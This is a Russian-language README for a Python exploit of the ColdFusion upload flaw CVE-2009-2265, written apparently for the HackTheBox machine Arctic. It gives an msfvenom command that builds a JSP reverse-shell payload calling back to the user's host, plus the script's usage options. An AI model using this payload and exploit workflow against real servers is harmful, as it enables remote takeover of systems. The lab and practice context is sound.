
эксплойт для ColdFusion на основе https://cvedetails.com/cve/CVE-2009-2265/
Эксплойт ColdFusion на основе https://cvedetails.com/cve/CVE-2009-2265/
Основной причиной, по которой я написал Python-скрипт для этого конкретного CVE, было то, что версия Metasploit для него не заработала у меня, когда я пытался решить машину Arctic на HTB. Кроме того, было приятно немного попрактиковаться в Python. Однако существует и другая версия этого же эксплойта на Python, изначально созданная Александром Ридом, если вы предпочитаете использовать его версию.
Использование довольно простое:
Убедитесь, что у вас создан файл с полезной нагрузкой
например, с помощью msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
использование: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
необязательные аргументы:
-h, --help показать это справочное сообщение и выйти
-t TARGET целевой IP-адрес
-p PORT целевой порт
-f FILEPATH путь к файлу с шелл-кодом для загрузки
-b BASEPATH базовый путь ColdFusion